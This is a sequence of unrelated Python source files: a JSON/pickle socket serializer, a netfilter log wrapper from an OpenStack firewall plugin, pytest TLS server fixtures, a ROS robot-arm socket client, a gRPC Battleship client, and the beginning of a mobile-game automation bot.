"""
Similar method to json dumps, prepending data with message length
header. Replaces pickle.dumps, so can be used in place without
the memory leaks on receiving side in pickle.loads (related to
memoization of data)
NOTE: Protocol is ignored when json representation is used
"""
fp = StringIO()
StreamHandler(fp).dump(obj)
return fp.getvalue()
def loads(s):
"""
Reads in json message or pickle message prepended with message length
header from a string. Message is expected to be encoded by this class as
well, to have same message length header type.
Specifically replaces pickle.loads as that function/method has serious
memory leak issues with long term use of same Unpickler object for
encoding data to send, specifically related to memoization of data to
encode.
"""
fp = StringIO(s)
return StreamHandler(fp).load()
class StreamHandler(object):
"""
This class provides a common streaming approach for the purpose
of reliably sending data over a socket interface. Replaces usage of
Unpickler.load where possible with JSON format prepended by message length
header. Uses json in python stdlib (in python >= 2.6) or simplejson (in
python < 2.6). If neither are available, falls back to pickle.Pickler and
pickle.Unpickler, attempting to eliminate memory leakage where possible at
the expense of CPU usage (by not re-using Pickler or Unpickler objects).
NOTE: StreamHandler currently assumes that same python version is installed
on both sides of reading/writing (or simplejson is loaded in case of one
side or other using python < 2.6). This could be resolved by requiring an
initial header with json vs pickle determination from the writing side, but
would considerably complicate the protocol(s) further (handshake would need
to occur at least, and assumes encoding is used over a socket, etc.)
json.raw_decode could be used rather than prepending with a message header
in theory (assuming json is available), but performance of repeatedly
failing to parse written data would make this an unworkable solution in
many cases.
"""
loads = staticmethod(loads)
dumps = staticmethod(dumps)
def __init__(self, fp):
"""
Stream handler that encodes objects as either JSON (if available) with
message length header prepended for sending over a socket, or as a
pickled object if using python < 2.6 and simplejson is not installed.
Since pickle.load has memory leak issues with memoization (remembers
absolutely everything decoded since instantiation), json is a preferred
method to encode/decode for long running processes which pass large
amounts of data back and forth.
"""
if _JSONAVAIL:
self._json_encoder = json.JSONEncoder(separators=(',', ':'),
sort_keys=True).encode
self._json_decoder = json.JSONDecoder(strict=False).decode
else:
def json_not_impl(dummy):
raise NotImplementedError(
'Python version < 2.6 and simplejson not installed. Please'
' install simplejson.')
self._json_decoder = staticmethod(json_not_impl)
self._json_encoder = staticmethod(json_not_impl)
self.fp = fp
def dump(self, obj):
"""
Similar method to json dump, prepending data with message length
header. Replaces pickle.dump, so can be used in place without
the memory leaks on receiving side in pickle.load (related to
memoization of data)
NOTE: Protocol is ignored when json representation is used
"""
# NOTE: Slightly less efficient than doing iterencode directly into the
# fp, however the difference is negligible and this reduces the complexity
# of the StreamHandler class (treating pickle and json the same)
write_list = []
if _JSONAVAIL:
write_list.append('J')
s = self._json_encoder(obj)
write_list.extend([str(len(s)), '|', s])
else:
write_list.append('P')
s = pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)
write_list.extend([str(len(s)), '|', s])
if PY2:
self.fp.write(''.join(write_list))
elif PY3:
self.fp.write(bytes(''.join(write_list), "UTF-8"))
# self.fp.flush()
def load(self):
"""
Reads in json message prepended with message length header from a file
(or socket, or other .read() enabled object). Message is expected to be
encoded by this class as well, to have same message length header type.
Specifically replaces pickle.load as that function/method has serious
memory leak issues with long term use of same Unpickler object for
encoding data to send, specifically related to memoization of data to
encode.
"""
header = self._load_header()
msgtype = header[0]
msglen = header[1:]
if not msglen.isdigit():
raise DecodeError('Message header not valid: %r' % header)
msglen = int(msglen)
buff = StringIO()
# Don't use StringIO.len for sizing, reports string len not bytes
buff.write(self.fp.read(msglen))
try:
if msgtype == 'J':
return self._json_decoder(buff.getvalue())
elif msgtype == 'P':
return pickle.loads(buff.getvalue())
else:
raise DecodeError("Message type %r not supported" % msgtype)
except DecodeError.wrapped_exceptions as e:
raise DecodeError(str(e))
def _load_header(self):
"""
Load in just the header bit from a socket/file pointer
"""
buff = StringIO()
while len(buff.getvalue()) == 0 or buff.getvalue()[-1] != '|':
recv_char = self.fp.read(1)
if not recv_char:
raise EOFError('File/Socket closed while reading load header')
buff.write(recv_char)
return buff.getvalue()[:-1]
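# Wire format illustration: dumping the object {'a': 1} on the json path
# writes J7|{"a":1} to the stream -- a one-character type marker ('J' for
# json, 'P' for pickle), the payload length as ASCII digits, a '|' separator,
# then the payload itself.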
|
libnetfilter_log.py
|
# Copyright (c) 2018 Fujitsu Limited
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import multiprocessing
import socket
import struct
import time
import cffi
import eventlet
from eventlet.green import zmq
from neutron_lib.utils import runtime
from os_ken.lib import addrconv
from os_ken.lib.packet import arp
from os_ken.lib.packet import ether_types
from os_ken.lib.packet import ethernet
from os_ken.lib.packet import ipv4
from os_ken.lib.packet import ipv6
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import excutils
from neutron_fwaas._i18n import _
from neutron_fwaas import privileged
from neutron_fwaas.privileged import utils as fwaas_utils
LOG = logging.getLogger(__name__)
# TODO(annp): consider making a pub-sub pattern which allows other logging
# drivers, like the snat log, to consume libnetfilter_log
NETFILTER_LOG = 'netfilter_log'
ADDR_IPC = "ipc:///var/run/nflog"
CDEF = '''
typedef unsigned char u_int8_t;
typedef unsigned short int u_int16_t;
typedef unsigned int u_int32_t;
struct nfulnl_msg_packet_hdr {
u_int16_t hw_protocol; // hw protocol (network order)
u_int8_t hook; // netfilter hook
u_int8_t _pad;
};
int nflog_fd(struct nflog_handle *h);
ssize_t recv(int sockfd, void *buf, size_t len, int flags);
struct nflog_handle *nflog_open(void);
int nflog_close(struct nflog_handle *h);
int nflog_bind_pf(struct nflog_handle *h, u_int16_t pf);
int nflog_unbind_pf(struct nflog_handle *h, u_int16_t pf);
struct nflog_g_handle *nflog_bind_group(struct nflog_handle *h, u_int16_t num);
int nflog_unbind_group(struct nflog_g_handle *gh);
static const u_int8_t NFULNL_COPY_PACKET;
int nflog_set_mode(struct nflog_g_handle *gh, u_int8_t mode, unsigned int len);
int nflog_set_timeout(struct nflog_g_handle *gh, u_int32_t timeout);
int nflog_set_flags(struct nflog_g_handle *gh, u_int16_t flags);
int nflog_set_qthresh(struct nflog_g_handle *gh, u_int32_t qthresh);
int nflog_set_nlbufsiz(struct nflog_g_handle *gh, u_int32_t nlbufsiz);
typedef int nflog_callback(struct nflog_g_handle *gh,
struct nfgenmsg *nfmsg, struct nflog_data *nfd, void *data);
int nflog_callback_register(
struct nflog_g_handle *gh, nflog_callback *cb, void *data);
int nflog_handle_packet(struct nflog_handle *h, char *buf, int len);
struct nfulnl_msg_packet_hdr *nflog_get_msg_packet_hdr(
struct nflog_data *nfad);
u_int16_t nflog_get_hwtype(struct nflog_data *nfad);
u_int16_t nflog_get_msg_packet_hwhdrlen(struct nflog_data *nfad);
char *nflog_get_msg_packet_hwhdr(struct nflog_data *nfad);
u_int32_t nflog_get_nfmark(struct nflog_data *nfad);
int nflog_get_timestamp(struct nflog_data *nfad, struct timeval *tv);
u_int32_t nflog_get_indev(struct nflog_data *nfad);
u_int32_t nflog_get_physindev(struct nflog_data *nfad);
u_int32_t nflog_get_outdev(struct nflog_data *nfad);
u_int32_t nflog_get_physoutdev(struct nflog_data *nfad);
struct nfulnl_msg_packet_hw *nflog_get_packet_hw(struct nflog_data *nfad);
int nflog_get_payload(struct nflog_data *nfad, char **data);
char *nflog_get_prefix(struct nflog_data *nfad);
'''
ffi = None
libnflog = None
def init_library():
"""Load libnetfilter_log library"""
global ffi
global libnflog
if not ffi:
ffi = cffi.FFI()
ffi.cdef(CDEF)
if not libnflog:
try:
libnflog = ffi.dlopen(NETFILTER_LOG)
except OSError:
msg = "Could not found libnetfilter-log"
raise Exception(msg)
return ffi, libnflog
ffi, libnflog = init_library()
def _payload(nfa):
buf = ffi.new('char **')
pkt_len = libnflog.nflog_get_payload(nfa, buf)
if pkt_len <= 0:
return None
return ffi.buffer(buf[0], pkt_len)[:]
def decode(nfa):
"""This function analyses nflog packet by using os-ken packet library."""
prefix = ffi.string(libnflog.nflog_get_prefix(nfa))
packet_hdr = libnflog.nflog_get_msg_packet_hdr(nfa)
hw_proto = socket.ntohs(packet_hdr.hw_protocol)
msg = ''
msg_packet_hwhdr = libnflog.nflog_get_msg_packet_hwhdr(nfa)
if msg_packet_hwhdr != ffi.NULL:
packet_hwhdr = ffi.string(msg_packet_hwhdr)
if len(packet_hwhdr) >= 12:
dst, src = struct.unpack_from('!6s6s', packet_hwhdr)
# Dump ethernet packet to get mac addresses
eth = ethernet.ethernet(addrconv.mac.bin_to_text(dst),
addrconv.mac.bin_to_text(src),
ethertype=hw_proto)
msg = str(eth)
# Dump IP packet
pkt = _payload(nfa)
if hw_proto == ether_types.ETH_TYPE_IP:
ip_pkt, proto, data = ipv4.ipv4().parser(pkt)
msg += str(ip_pkt)
proto_pkt, a, b = proto.parser(data)
msg += str(proto_pkt)
elif hw_proto == ether_types.ETH_TYPE_IPV6:
ip_pkt, proto, data = ipv6.ipv6().parser(pkt)
proto_pkt, a, b = proto.parser(data)
msg += str(proto_pkt)
elif hw_proto == ether_types.ETH_TYPE_ARP:
ip_pkt, proto, data = arp.arp().parser(pkt)
msg += str(ip_pkt)
else:
msg += "Does not support hw_proto: " + str(hw_proto)
return {'prefix': str(prefix), 'msg': str(msg)}
class NFLogWrapper(object):
"""A wrapper for libnetfilter_log api"""
_instance = None
def __init__(self):
self.nflog_g_hanldes = {}
@classmethod
@runtime.synchronized("nflog-wrapper")
def _create_instance(cls):
if not cls.has_instance():
cls._instance = cls()
@classmethod
def has_instance(cls):
return cls._instance is not None
@classmethod
def clear_instance(cls):
cls._instance = None
@classmethod
def get_instance(cls):
# double checked locking
if not cls.has_instance():
cls._create_instance()
return cls._instance
def open(self):
self.nflog_handle = libnflog.nflog_open()
if not self.nflog_handle:
msg = _("Could not open nflog handle")
raise Exception(msg)
self._bind_pf()
def close(self):
if self.nflog_handle:
libnflog.nflog_close(self.nflog_handle)
def bind_group(self, group):
g_handle = libnflog.nflog_bind_group(self.nflog_handle, group)
if g_handle:
self.nflog_g_hanldes[group] = g_handle
self._set_mode(g_handle, 0x2, 0xffff)
self._set_callback(g_handle, self.cb)
def _bind_pf(self):
for pf in (socket.AF_INET, socket.AF_INET6):
libnflog.nflog_unbind_pf(self.nflog_handle, pf)
libnflog.nflog_bind_pf(self.nflog_handle, pf)
def unbind_group(self, group):
try:
g_handle = self.nflog_g_hanldes[group]
if g_handle:
libnflog.nflog_unbind_group(g_handle)
except Exception:
pass
def _set_mode(self, g_handle, mode, len):
ret = libnflog.nflog_set_mode(g_handle, mode, len)
if ret != 0:
msg = _("Could not set mode for nflog")
raise Exception(msg)
@ffi.callback("nflog_callback")
def cb(gh, nfmsg, nfa, data):
ev = decode(nfa)
msg = jsonutils.dumps(ev) + '\n'
ctx = zmq.Context(1)
pub = ctx.socket(zmq.XREQ)
pub.bind(ADDR_IPC)
pub.send(msg.encode('utf-8'))
pub.close()
return 0
def _set_callback(self, g_handle, cb):
ret = libnflog.nflog_callback_register(g_handle, cb, ffi.NULL)
if ret != 0:
msg = _("Could not set callback for nflog")
raise Exception(msg)
def run_loop(self):
fd = libnflog.nflog_fd(self.nflog_handle)
buff = ffi.new('char[]', 4096)
while True:
try:
pkt_len = libnflog.recv(fd, buff, 4096, 0)
except OSError as err:
# No buffer space available
if err.errno == 11:
continue
msg = _("Unknown exception")
raise Exception(msg)
if pkt_len > 0:
libnflog.nflog_handle_packet(self.nflog_handle, buff, pkt_len)
time.sleep(1.0)
def start(self):
nflog_process = multiprocessing.Process(target=self.run_loop)
nflog_process.daemon = True
nflog_process.start()
return nflog_process.pid
@privileged.default.entrypoint
def run_nflog(namespace=None, group=0):
"""Run a nflog process under a namespace
This process will listen nflog packets, which are sent from kernel to
userspace. Then it decode these packets and send it to IPC address for log
application.
"""
with fwaas_utils.in_namespace(namespace):
try:
handle = NFLogWrapper.get_instance()
handle.open()
handle.bind_group(group)
pid = handle.start()
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception("NFLOG thread died of an exception")
try:
handle.unbind_group(group)
handle.close()
except Exception:
pass
return pid
class NFLogApp(object):
"""Log application for handling nflog packets"""
callback = None
def register_packet_handler(self, caller):
self.callback = caller
def unregister_packet_handler(self):
self.callback = None
def start(self):
def loop():
while True:
if self.callback:
ctx = zmq.Context(1)
sub = ctx.socket(zmq.XREQ)
sub.connect(ADDR_IPC)
msg = sub.recv()
if len(msg):
self.callback(jsonutils.loads(msg))
sub.close()
time.sleep(1.0)
# Spawn loop
eventlet.spawn_n(loop)
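# Example consumer (illustrative sketch; the handler body is hypothetical):
#
#   app = NFLogApp()
#   app.register_packet_handler(lambda event: LOG.info(event))
#   app.start()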
|
conftest.py
|
import collections
import contextlib
import platform
import sys
import threading
import pytest
import trustme
from tornado import ioloop, web
from dummyserver.handlers import TestingApp
from dummyserver.server import HAS_IPV6, run_tornado_app
from .tz_stub import stub_timezone_ctx
# The Python 3.8+ default loop on Windows breaks Tornado
@pytest.fixture(scope="session", autouse=True)
def configure_windows_event_loop():
if sys.version_info >= (3, 8) and platform.system() == "Windows":
import asyncio
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
ServerConfig = collections.namedtuple("ServerConfig", ["host", "port", "ca_certs"])
@contextlib.contextmanager
def run_server_in_thread(scheme, host, tmpdir, ca, server_cert):
ca_cert_path = str(tmpdir / "ca.pem")
server_cert_path = str(tmpdir / "server.pem")
server_key_path = str(tmpdir / "server.key")
ca.cert_pem.write_to_path(ca_cert_path)
server_cert.private_key_pem.write_to_path(server_key_path)
server_cert.cert_chain_pems[0].write_to_path(server_cert_path)
server_certs = {"keyfile": server_key_path, "certfile": server_cert_path}
io_loop = ioloop.IOLoop.current()
app = web.Application([(r".*", TestingApp)])
server, port = run_tornado_app(app, io_loop, server_certs, scheme, host)
server_thread = threading.Thread(target=io_loop.start)
server_thread.start()
yield ServerConfig(host, port, ca_cert_path)
io_loop.add_callback(server.stop)
io_loop.add_callback(io_loop.stop)
server_thread.join()
@pytest.fixture
def no_san_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# only common name, no subject alternative names
server_cert = ca.issue_cert(common_name=u"localhost")
with run_server_in_thread("https", "localhost", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ip_san_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Subject Alternative Name
server_cert = ca.issue_cert(u"127.0.0.1")
with run_server_in_thread("https", "127.0.0.1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ipv6_addr_server(tmp_path_factory):
if not HAS_IPV6:
pytest.skip("Only runs on IPv6 systems")
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Common Name
server_cert = ca.issue_cert(common_name=u"::1")
with run_server_in_thread("https", "::1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ipv6_san_server(tmp_path_factory):
if not HAS_IPV6:
pytest.skip("Only runs on IPv6 systems")
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Subject Alternative Name
server_cert = ca.issue_cert(u"::1")
with run_server_in_thread("https", "::1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def stub_timezone(request):
"""
A pytest fixture that runs the test with a stub timezone.
"""
with stub_timezone_ctx(request.param):
yield
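# Example (illustrative): stub_timezone takes its value through indirect
# parametrization, e.g.
#
#   @pytest.mark.parametrize("stub_timezone", ["UTC", "Europe/London"],
#                            indirect=True)
#   def test_in_timezone(stub_timezone):
#       ...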
|
HiwinRA605_socket_ros_20190530111958.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy side and send them over a socket to the control computer
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import talker as talk
import enum
data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # initial value of the response counter
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # PEP 479: raising StopIteration inside a generator is an error in Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server -------
##--------touch strategy--------###
def point_data(req):
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req):
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##--------touch strategy end--------###
def socket_server():
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server end-------
##----------socket packet transmission--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
start_input = int(input('Press 1 to start transmission, 3 to exit: '))
#start_input = 1
if start_input==1:
while 1:
##---------------send arm commands over socket-----------------
for case in switch(socket_cmd.action):
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
if case(Taskcmd.Action_Type.Mode):
data = TCP.SetMode()
break
socket_cmd.action= 5
s.send(data.encode('utf-8')) # send over the socket; encode the command string for transmission
feedback_str = s.recv(1024)
# the arm side reports its state back
###test 0403
if str(feedback_str[2]) == '70':# F
feedback = 0
socket_client_arm_state(feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T
feedback = 1
socket_client_arm_state(feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6
feedback = 6
socket_client_arm_state(feedback)
print("shutdown")
#Hiwin test 20190521
# feedback = 0
# socket_client_arm_state(feedback)
#Hiwin test 20190521
Arm_feedback = TCP.Is_busy(feedback)
###test 0403
##---------------send arm commands over socket end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket packet transmission end--------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5
t = threading.Thread(target=thread_test)
t.start()
socket_server()
t.join()
|
battleship_client.py
|
import grpc
import logging
import queue
import threading
import uuid
from battleships_pb2 import Attack, Request, Response, Status
from battleships_pb2_grpc import BattleshipsStub
from client_interface import ClientInterface
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
class BattleshipClient(ClientInterface):
# The gRPC turn types mapped onto handler method names
RESPONSES = {
Response.State.BEGIN: 'begin',
Response.State.START_TURN: 'start_turn',
Response.State.STOP_TURN: 'end_turn',
Response.State.WIN: 'win',
Response.State.LOSE: 'lose',
}
# The gRPC report states mapped onto handler method names
STATES = {
Status.State.MISS: 'miss',
Status.State.HIT: 'hit',
}
__supported_events = [
'begin', 'start_turn', 'end_turn', 'attack',
'hit', 'miss', 'win', 'lose'
]
def __init__(self, grpc_host='localhost', grpc_port='50051'):
self.__handlers = {}
self.__host = grpc_host
self.__port = grpc_port
self.__player_id = ''
self.__queue = queue.Queue()
self.__channel = grpc.insecure_channel(f'{self.__host}:{self.__port}')
self.__stub = BattleshipsStub(self.__channel)
def __del__(self):
if self.__channel is not None:
self.__channel.close()
def on(self, event=None):
"""A decorator that is used to register an event handler for a
        given event. This does the same as :meth:`add_event_listener`
but is intended for decorator usage:
@client.on(event='attack')
def on_attack(vector):
pass
:param event: The event that the handler should listen for. If
this parameter is None, the event is inferred from
the handler's name. For instance, to add a handler
for `attack` messages, you can simply write:
@client.on()
def attack(vector):
pass
        Handlers that are supported are `begin`, `start_turn`,
        `end_turn`, `attack`, `hit`, `miss`, `win` and `lose`.
"""
def decorator(f):
self.add_event_listener(event, f)
return f
return decorator
def add_event_listener(self, event=None, handler=None):
"""Method that is used to register an event handler for a
given event. See :meth:`on` for a detailed explanation.
:param event: Event to register handler for
:param handler: Handler for event
"""
if event is None:
event = handler.__name__
if event not in self.__supported_events:
raise ValueError(f'Unable to register event {event}!')
logger.info(f'Registering {handler.__name__} for event "{event}"')
self.__handlers[event] = handler
def join(self):
"""This method sets up the client for sending and receiving gRPC
messages to the server. It then sends a join message to the game
server to indicate we are ready to play a new game.
"""
self.__player_id = str(uuid.uuid4())
logger.info(f'New player: {self.__player_id}')
threading.Thread(target=self.__receive_responses, daemon=True).start()
# Everything's set up, so we can now join a game
self.__send(Request(join=Request.Player(id=self.__player_id)))
def __send(self, msg):
"""Convience method that places a message in the queue for
transmission to the game server.
"""
self.__queue.put(msg)
def attack(self, vector):
"""This method sends an Attack message with the associated vector
to the game server. This method does not do any validation on the
        provided vector, other than that it must be a string. It is up to
the caller to determine what the vector should look like.
:param vector: Vector to send to game server, e.g., "G4"
:raise ValueError: if vector is None or not a string
"""
if vector is None or type(vector) is not str:
raise ValueError('Parameter vector must be a string!')
self.__send(Request(move=Attack(vector=vector)))
def hit(self):
"""This method indicates to the game server that the received
attack was a HIT. Oh no!
"""
self.__send(Request(report=Status(state=Status.State.HIT)))
def miss(self):
"""This method indicates to the game server that the received
attack was a MISS. Phew!
"""
self.__send(Request(report=Status(state=Status.State.MISS)))
def defeat(self):
"""This method indicates to the game serve that the received
attack was a HIT, which sunk the last of the remaining ships.
In other words: Game Over. Too bad.
"""
self.__send(Request(report=Status(state=Status.State.DEFEAT)))
def __stream(self):
"""Return a generator of outgoing gRPC messages.
:return: a gRPC message generator
"""
while True:
s = self.__queue.get()
if s is not None:
logger.info(f'{self.__player_id} - Sending {s}')
yield s
else:
return
def __receive_responses(self):
"""Receive response from the gRPC in-channel.
"""
responses = self.__stub.Game(self.__stream())
while True:
try:
response = next(responses)
logger.info(f'{self.__player_id} - Received {response}')
self.__handle_response(response)
except StopIteration:
return
def __handle_response(self, msg):
"""This method handles the actual response coming from the game
server.
:param msg: Message received from the game server
"""
which = msg.WhichOneof('event')
if which == 'turn':
if msg.turn in self.RESPONSES:
self.__exc_callback(self.RESPONSES[msg.turn])
else:
logger.error('Response contains unknown state!')
elif which == 'move':
self.__exc_callback('attack', msg.move.vector)
elif which == 'report':
if msg.report.state in self.STATES:
self.__exc_callback(self.STATES[msg.report.state])
else:
logger.error('Report contains unknown state!')
else:
logger.error('Got unknown response type!')
def __exc_callback(self, *args):
"""Convenience method that calls the appropriate callback
function if it has been registered.
"""
cmd = args[0]
if cmd in self.__handlers:
self.__handlers[cmd](*args[1:])
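# Minimal usage sketch (illustrative only): register a couple of handlers and join a
# game. It assumes a Battleships gRPC server is listening on the default
# localhost:50051; the vector 'G4' and the sleep duration are arbitrary examples.
if __name__ == '__main__':
    import time

    client = BattleshipClient()

    @client.on()
    def start_turn():
        # Our turn: fire at an example square.
        client.attack('G4')

    @client.on(event='attack')
    def on_attack(vector):
        # The opponent fired at `vector`; report a miss purely for illustration.
        client.miss()

    client.join()
    time.sleep(60)  # keep the main thread alive while the daemon receive thread runs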
|
bot.py
|
import threading
import traceback
from threading import Lock
import time
from tasks.Items import Items
from tasks.LostCanyon import LostCanyon
from tasks.Task import Task
from bot_related.bot_config import BotConfig
from bot_related.device_gui_detector import GuiDetector, GuiName
from filepath.file_relative_paths import ImagePathAndProps, VERIFICATION_CLOSE_REFRESH_OK, VERIFICATION_VERIFY_TITLE
from tasks.Alliance import Alliance
from tasks.Barbarians import Barbarians
from tasks.Break import Break
from tasks.ClaimQuests import ClaimQuests
from tasks.ClaimVip import ClaimVip
from tasks.Collecting import Collecting
from tasks.GatherResource import GatherResource
from tasks.LocateBuildings import LocateBuilding
from tasks.Materials import Materials
from tasks.Restart import Restart
from tasks.Scout import Scout
from tasks.ScreenShot import ScreenShot
from tasks.Tavern import Tavern
from tasks.Training import Training
from tasks.MysteryMerchant import MysteryMerchant
from tasks.SunsetCanyon import SunsetCanyon
from tasks.constants import TaskName
from utils import stop_thread
import random
DEFAULT_RESOLUTION = {'height': 720, 'width': 1280}
class Bot():
def __init__(self, device, config={}):
self.daemon_thread = None
self.curr_thread = None
self.device = device
self.gui = GuiDetector(device)
self.text_update_event = lambda v: v
self.text = {
'title': '',
'text_list': []
}
self.building_pos_update_event = lambda **kw: kw
self.config_update_event = lambda **kw: kw
# get screen resolution
        size_str = device.shell('wm size').replace('\n', '')
        height, width = list(map(int, size_str[(size_str.find(':') + 1):].split('x')))
self.resolution = {
'height': height,
'width': width
}
self.building_pos = {}
self.config = BotConfig(config)
self.curr_task = TaskName.BREAK
self.task = Task(self)
# tasks
self.restart_task = Restart(self)
self.break_task = Break(self)
self.mystery_merchant_task = MysteryMerchant(self)
self.alliance_task = Alliance(self)
self.barbarians_task = Barbarians(self)
self.claim_quests_task = ClaimQuests(self)
self.claim_vip_task = ClaimVip(self)
self.collecting_task = Collecting(self)
self.gather_resource_task = GatherResource(self)
self.locate_building_task = LocateBuilding(self)
self.materials_task = Materials(self)
self.scout_task = Scout(self)
self.tavern_task = Tavern(self)
self.training = Training(self)
self.sunset_canyon = SunsetCanyon(self)
self.lost_canyon = LostCanyon(self)
self.items_task = Items(self)
# Other task
self.screen_shot_task = ScreenShot(self)
self.round_count = 0
def start(self, fn):
if self.daemon_thread is not None and self.daemon_thread.is_alive():
stop_thread(self.daemon_thread)
            print('daemon_thread: {}'.format(self.daemon_thread.is_alive()))
if self.curr_thread is not None and self.curr_thread.is_alive():
stop_thread(self.curr_thread)
            print('curr_thread: {}'.format(self.curr_thread.is_alive()))
self.daemon(fn)
def stop(self):
if self.daemon_thread is not None and self.daemon_thread.is_alive():
stop_thread(self.daemon_thread)
            print('daemon_thread: {}'.format(self.daemon_thread.is_alive()))
if self.curr_thread is not None and self.curr_thread.is_alive():
stop_thread(self.curr_thread)
            print('curr_thread: {}'.format(self.curr_thread.is_alive()))
def get_city_image(self):
return self.screen_shot_task.do_city_screen()
def do_task(self, curr_task=TaskName.COLLECTING):
tasks = [
[self.mystery_merchant_task, 'enableMysteryMerchant'],
[self.alliance_task, 'allianceAction', 'allianceDoRound'],
[self.barbarians_task, 'attackBarbarians'],
